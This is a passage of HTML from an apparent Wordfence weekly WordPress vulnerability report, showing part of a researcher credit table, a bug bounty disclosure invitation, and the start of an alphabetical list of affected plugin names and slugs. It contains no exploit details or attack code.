					<img decoding="async" src="https://www.gravatar.com/avatar/0fdabee8f7d07866c3e86fca8d985ce7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0fdabee8f7d07866c3e86fca8d985ce7"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/g0053" target="_blank" rel="noopener">G0053</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/401bad744b8274f340c78fd03086a60a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="401bad744b8274f340c78fd03086a60a"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tanishq-shah" target="_blank" rel="noopener">Tanishq Shah</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3b9ba262ab672a53e1707857cc391135.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3b9ba262ab672a53e1707857cc391135"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thatchapol-booranatanit-alicezz" target="_blank" rel="noopener">Thatchapol Booranatanit (AliceZz)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/1509f4074eb474ab3027fc87140a9f43.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1509f4074eb474ab3027fc87140a9f43"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bhaveshkumar-parmar" target="_blank" rel="noopener">Bhaveshkumar Parmar</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3de24b42a136b2de55a6032099259119.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3de24b42a136b2de55a6032099259119"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/gaurav-popalghat" target="_blank" rel="noopener">Gaurav popalghat</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/391494aab21a49e63f502a6846e4de16.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="391494aab21a49e63f502a6846e4de16"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/lucas-montes" target="_blank" rel="noopener">Lucas Montes (NiRoX)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8e8a01bf0b9d95d7919748a0a689fb3c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8e8a01bf0b9d95d7919748a0a689fb3c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ren-voza" target="_blank" rel="noopener">Ren Voza</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3aaf07d3bb58c6890b089f9ff6d2734d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3aaf07d3bb58c6890b089f9ff6d2734d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tiborisaak" target="_blank" rel="noopener">tiborisaak</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f1f186a43626c61a7e05b5db4a89b87d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f1f186a43626c61a7e05b5db4a89b87d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asim-alshaya" target="_blank" rel="noopener">Asim Alshaya</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f8128afd0f91dd0938118b9db5afbfd4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f8128afd0f91dd0938118b9db5afbfd4"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/akshat-parikh" target="_blank" rel="noopener">Akshat Parikh</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/bc745b1e2ceadfe5d16db4872cf2c8b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bc745b1e2ceadfe5d16db4872cf2c8b9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chamseddine-bouzaiene" target="_blank" rel="noopener">Chamseddine Bouzaiene</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/51ac16594069727fd09950dd36cda805.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="51ac16594069727fd09950dd36cda805"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/talal-nasraddeen" target="_blank" rel="noopener">Talal Nasraddeen</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4ab98975ac05f81bf1e8e943aca71c60.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4ab98975ac05f81bf1e8e943aca71c60"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abiodun-victor-taiwo" target="_blank" rel="noopener">ABIODUN VICTOR TAIWO</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/db76c9ad8fed7273064e3381b162549b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="db76c9ad8fed7273064e3381b162549b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/leonid-semenenko" target="_blank" rel="noopener">Leonid Semenenko (lsemenenko)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f894d5600bcba5e947d6dde37a3cec1b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f894d5600bcba5e947d6dde37a3cec1b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/stealthcopter" target="_blank" rel="noopener">stealthcopter</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d8b3fd1db7b2d1617a3592b09f77c3ca.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d8b3fd1db7b2d1617a3592b09f77c3ca"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abiodun-victor" target="_blank" rel="noopener">Abiodun Victor</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/59835aea7e82e25c9b26bb683490e69d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="59835aea7e82e25c9b26bb683490e69d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/huytqtq" target="_blank" rel="noopener">huytqtq</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/26f3449f5fd6f5b863626494f64fdb7e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="26f3449f5fd6f5b863626494f64fdb7e"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ezekiel-victor" target="_blank" rel="noopener">Ezekiel Victor</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c91011e314f83633b3cbb16f20ce60b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c91011e314f83633b3cbb16f20ce60b9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/huseyn" target="_blank" rel="noopener">Huseyn</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/04dc25fcada9520afe8fb170e539d8b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="04dc25fcada9520afe8fb170e539d8b9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yaswanth-reddy-sunkara" target="_blank" rel="noopener">Yaswanth Reddy Sunkara</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/04dfc3bf44cc1da4b86fd64635100766.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="04dfc3bf44cc1da4b86fd64635100766"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tyler-chin" target="_blank" rel="noopener">Tyler Chin</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c51e057afcf1f4a61beefd37f423c06d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c51e057afcf1f4a61beefd37f423c06d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ashv4ni" target="_blank" rel="noopener">ashv4ni</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/29bd5dd110d9d483d533b011e29522de.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="29bd5dd110d9d483d533b011e29522de"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dthangws" target="_blank" rel="noopener">Dthangws</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3a44d04cdd3490b305d8f18cf157f1fd.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3a44d04cdd3490b305d8f18cf157f1fd"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/robert-hartinger" target="_blank" rel="noopener">mad4cyber</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8e196345806e141d3c31b5b5d8489ec0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8e196345806e141d3c31b5b5d8489ec0"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/seongwon-lee" target="_blank" rel="noopener">Seongwon Lee</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
</table>
<p><em>Are you a security researcher who would like to be featured in our weekly vulnerability report?</em> You can responsibly disclose your WordPress vulnerability discoveries to us and earn a bounty on in-scope vulnerabilities <a href="https://www.wordfence.com/threat-intel/vulnerabilities/submit/" target="_blank" rel="noopener">through our Bug Bounty Program</a>. Responsibly disclosing your vulnerability discoveries to us will also get your name added on the <a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/" target="_blank" rel="noopener">Wordfence Intelligence leaderboard</a> along with being mentioned in our weekly vulnerability report.</p>
<hr>
<h3>WordPress Plugins with Reported Vulnerabilities Last Week</h3>
</p>
<table class="wfvr-list-table software-list">
<tr>
<th class="text-center w-50">Software Name</th>
<th class="text-center">Software Slug</th>
</tr>
<tr>
<td>12 Step Meeting List</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/12-step-meeting-list" target="_blank" rel="noopener">12-step-meeting-list</a>
		</td>
</tr>
<tr>
<td>ACPT (Premium)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-custom-post-type" target="_blank" rel="noopener">advanced-custom-post-type</a>
		</td>
</tr>
<tr>
<td>Advanced Custom Fields: Extended</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/acf-extended" target="_blank" rel="noopener">acf-extended</a>
		</td>
</tr>
<tr>
<td>Affiliate Program Suite — SliceWP Affiliates</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/slicewp" target="_blank" rel="noopener">slicewp</a>
		</td>
</tr>
<tr>
<td>AI Engine – The Chatbot, AI Framework &amp; MCP for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ai-engine" target="_blank" rel="noopener">ai-engine</a>
		</td>
</tr>
<tr>
<td>All-in-One WP Migration and Backup</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/all-in-one-wp-migration" target="_blank" rel="noopener">all-in-one-wp-migration</a>
		</td>
</tr>
<tr>
<td>All-in-One WP Migration Unlimited Extension</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/all-in-one-wp-migration-unlimited-extension" target="_blank" rel="noopener">all-in-one-wp-migration-unlimited-extension</a>
		</td>
</tr>
<tr>
<td>Animation Addons for Elementor – GSAP Motion Elementor Addons &amp; Website Templates</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/animation-addons-for-elementor" target="_blank" rel="noopener">animation-addons-for-elementor</a>
		</td>
</tr>
<tr>
<td>Appointment Booking Calendar Plugin and Scheduling Plugin – BookingPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bookingpress-appointment-booking" target="_blank" rel="noopener">bookingpress-appointment-booking</a>
		</td>
</tr>
<tr>
<td>Avada (Fusion) Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fusion-builder" target="_blank" rel="noopener">fusion-builder</a>
		</td>
</tr>
<tr>
<td>Beautiful taxonomy filters</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/beautiful-taxonomy-filters" target="_blank" rel="noopener">beautiful-taxonomy-filters</a>
		</td>
</tr>
<tr>
<td>BetterLinks – Link Shortener, Link Cloaking, Redirects, Affiliate Link Manager &amp; MCP</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/betterlinks" target="_blank" rel="noopener">betterlinks</a>
		</td>
</tr>
<tr>
<td>BlogVault Backup &amp; Staging</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/blogvault-real-time-backup" target="_blank" rel="noopener">blogvault-real-time-backup</a>
		</td>
</tr>
<tr>
<td>Booking and Rental Manager for Bike | Car | Resort | Appointment | Dress | Equipment</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/booking-and-rental-manager-for-woocommerce" target="_blank" rel="noopener">booking-and-rental-manager-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>Booking for Appointments and Events Calendar – Amelia</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ameliabooking" target="_blank" rel="noopener">ameliabooking</a>
		</td>
</tr>
<tr>
<td>Booking Package</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/booking-package" target="_blank" rel="noopener">booking-package</a>
		</td>
</tr>
<tr>
<td>Breeze Cache</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/breeze" target="_blank" rel="noopener">breeze</a>
		</td>
</tr>
<tr>
<td>Catfolders Document Gallery Pro</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/catfolders-document-gallery-pro" target="_blank" rel="noopener">catfolders-document-gallery-pro</a>
		</td>
</tr>
<tr>
<td>Classified Listing &#8211; Mobile Number Verification</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rtcl-verification" target="_blank" rel="noopener">rtcl-verification</a>
		</td>
</tr>
<tr>
<td>CM Map Locations – Visualize and share your locations in a few clicks</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cm-map-locations" target="_blank" rel="noopener">cm-map-locations</a>
		</td>
</tr>
<tr>
<td>CMP – Coming Soon &amp; Maintenance Plugin by NiteoThemes</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cmp-coming-soon-maintenance" target="_blank" rel="noopener">cmp-coming-soon-maintenance</a>
		</td>
</tr>
<tr>
<td>Content Mask</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/content-mask" target="_blank" rel="noopener">content-mask</a>
		</td>
</tr>
<tr>
<td>Cozy Blocks – Page Builder for Gutenberg Editor &amp; FSE with 700+ Patterns, 58 Blocks &amp; Templates</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cozy-addons" target="_blank" rel="noopener">cozy-addons</a>
		</td>
</tr>
<tr>
<td>CP Media Player – Audio Player and Video Player</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/audio-and-video-player" target="_blank" rel="noopener">audio-and-video-player</a>
		</td>
</tr>
<tr>
<td>Custom User Registration Fields for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration-plugin-for-woocommerce" target="_blank" rel="noopener">user-registration-plugin-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>Customer Reviews for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/customer-reviews-woocommerce" target="_blank" rel="noopener">customer-reviews-woocommerce</a>
		</td>
</tr>
<tr>
<td>Defender Security – Malware Scanner, Login Security &amp; Firewall</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/defender-security" target="_blank" rel="noopener">defender-security</a>
		</td>
</tr>
<tr>
<td>Directorist: AI-Powered Business Directory, Listings &amp; Classified Ads</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/directorist" target="_blank" rel="noopener">directorist</a>
		</td>
</tr>
<tr>
<td>Ditty – Responsive News Tickers, Sliders, and Lists</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ditty-news-ticker" target="_blank" rel="noopener">ditty-news-ticker</a>
		</td>
</tr>
<tr>
<td>Document Embedder – let visitors read files without downloading</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/document-emberdder" target="_blank" rel="noopener">document-emberdder</a>
		</td>
</tr>
<tr>
<td>Dokan: AI Powered WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dokan-lite" target="_blank" rel="noopener">dokan-lite</a>
		</td>
</tr>
<tr>
<td>Drag and Drop Multiple File Upload for Contact Form 7</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/drag-and-drop-multiple-file-upload-contact-form-7" target="_blank" rel="noopener">drag-and-drop-multiple-file-upload-contact-form-7</a>
		</td>
</tr>
<tr>
<td>Duplicate Post</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/copy-delete-posts" target="_blank" rel="noopener">copy-delete-posts</a>
		</td>
</tr>
<tr>
<td>eCommerce Product Catalog</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ecommerce-product-catalog" target="_blank" rel="noopener">ecommerce-product-catalog</a>
		</td>
</tr>
<tr>
<td>ElementsKit Pro</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/elementskit" target="_blank" rel="noopener">elementskit</a>
		</td>
</tr>
<tr>
<td>Email Essentials</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/email-essentials" target="_blank" rel="noopener">email-essentials</a>
		</td>
</tr>
<tr>
<td>Email Subscribers &amp; Newsletters – Email Marketing, Post Notifications &amp; Newsletter Plugin for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/email-subscribers" target="_blank" rel="noopener">email-subscribers</a>
		</td>
</tr>
<tr>
<td>Envira Gallery – Image Photo Gallery, Albums, Video Gallery, Slideshows &amp; More</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/envira-gallery-lite" target="_blank" rel="noopener">envira-gallery-lite</a>
		</td>
</tr>
<tr>
<td>ePayco plugin for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/epayco-gateway" target="_blank" rel="noopener">epayco-gateway</a>
		</td>
</tr>
<tr>
<td>ERP: Complete HR, Accounting &amp; CRM Suite Built for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/erp" target="_blank" rel="noopener">erp</a>
		</td>
</tr>
<tr>
<td>Essential Addons for Elementor – Popular Elementor Templates &amp; Widgets</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/essential-addons-for-elementor-lite" target="_blank" rel="noopener">essential-addons-for-elementor-lite</a>
		</td>
</tr>
<tr>
<td>Event Booking Manager for WooCommerce – Sell Tickets, Event Registration, RSVP &amp; Event Calendar</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mage-eventpress" target="_blank" rel="noopener">mage-eventpress</a>
		</td>
</tr>
<tr>
<td>Eventin – Event Calendar, Tickets, Registration, Booking &amp; WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-event-solution" target="_blank" rel="noopener">wp-event-solution</a>
		</td>
</tr>
<tr>
<td>Events Manager – Calendar, Bookings, Tickets, and more!</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/events-manager" target="_blank" rel="noopener">events-manager</a>
		</td>
</tr>
<tr>
<td>Everest Forms – Contact Form, Payment Form, Quiz, Survey &amp; Custom Form Builder with AI</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/everest-forms" target="_blank" rel="noopener">everest-forms</a>
		</td>
</tr>
<tr>
<td>FiboSearch – Ajax Search for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ajax-search-for-woocommerce" target="_blank" rel="noopener">ajax-search-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>Finale Lite – Sales Countdown Timer &amp; Discount for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/finale-woocommerce-sales-countdown-timer-discount" target="_blank" rel="noopener">finale-woocommerce-sales-countdown-timer-discount</a>
		</td>
</tr>
<tr>
<td>Fluent Boards Pro</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluent-boards-pro" target="_blank" rel="noopener">fluent-boards-pro</a>
		</td>
</tr>
<tr>
<td>Fluent Booking Pro</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluent-booking-pro" target="_blank" rel="noopener">fluent-booking-pro</a>
		</td>
</tr>
<tr>
<td>Fluent Forms Pro Add On Pack</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluentformpro" target="_blank" rel="noopener">fluentformpro</a>
		</td>
</tr>
<tr>
<td>Fluent Player Pro</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluent-player-pro" target="_blank" rel="noopener">fluent-player-pro</a>
		</td>
</tr>
<tr>
<td>Fluent Support Pro</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluent-support-pro" target="_blank" rel="noopener">fluent-support-pro</a>
		</td>
</tr>
<tr>
<td>FluentCart A New Era of eCommerce – Faster, Lighter, and Simpler</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluent-cart" target="_blank" rel="noopener">fluent-cart</a>
		</td>
</tr>
<tr>
<td>FluentCRM PRO</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluentcampaign-pro" target="_blank" rel="noopener">fluentcampaign-pro</a>
		</td>
</tr>
<tr>
<td>FluentCRM Pro – Email Newsletter, Automation, Email Marketing, Email Campaigns, Optins, Leads, and CRM Solution</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluentcrm-pro" target="_blank" rel="noopener">fluentcrm-pro</a>
		</td>
</tr>
<tr>
<td>Formidable Charts</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/formidable-charts" target="_blank" rel="noopener">formidable-charts</a>
		</td>
</tr>
<tr>
<td>Formidable Forms – WordPress Form Builder for Contact Forms, Calculators, Quizzes &amp; More</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/formidable" target="_blank" rel="noopener">formidable</a>
		</td>
</tr>
<tr>
<td>Forminator Forms – Contact Form, Payment Form &amp; Custom Form Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/forminator" target="_blank" rel="noopener">forminator</a>
		</td>
</tr>
<tr>
<td>Frontend Admin by DynamiApps</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/acf-frontend-form-element" target="_blank" rel="noopener">acf-frontend-form-element</a>
		</td>
</tr>
<tr>
<td>FundEngine – Donation and Crowdfunding Platform</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-fundraising-donation" target="_blank" rel="noopener">wp-fundraising-donation</a>
		</td>
</tr>
<tr>
<td>Geo Controller</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cf-geoplugin" target="_blank" rel="noopener">cf-geoplugin</a>
		</td>
</tr>
<tr>
<td>GeoDirectory – WP Business Directory Plugin and Classified Listings Directory</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/geodirectory" target="_blank" rel="noopener">geodirectory</a>
		</td>
</tr>
<tr>
<td>GeotargetingWP</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/geotargetingwp" target="_blank" rel="noopener">geotargetingwp</a>
		</td>
</tr>
<tr>
<td>GiveWP – Donation Plugin and Fundraising Platform</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/give" target="_blank" rel="noopener">give</a>
		</td>
</tr>
<tr>
<td>Greenshift – animation and page builder blocks</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/greenshift-animation-and-page-builder-blocks" target="_blank" rel="noopener">greenshift-animation-and-page-builder-blocks</a>
		</td>
</tr>
<tr>
<td>Gutenverse – WordPress Blocks, Page Builder &amp; Site Editor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gutenverse" target="_blank" rel="noopener">gutenverse</a>
		</td>
</tr>
<tr>
<td>Hash Form – Drag &amp; Drop Form Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hash-form" target="_blank" rel="noopener">hash-form</a>
		</td>
</tr>
<tr>
<td>HEL Online Classroom: AI-powered Online Classrooms</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hel-online-classroom" target="_blank" rel="noopener">hel-online-classroom</a>
		</td>
</tr>
<tr>
<td>InfusedWoo Pro</td>
<td>
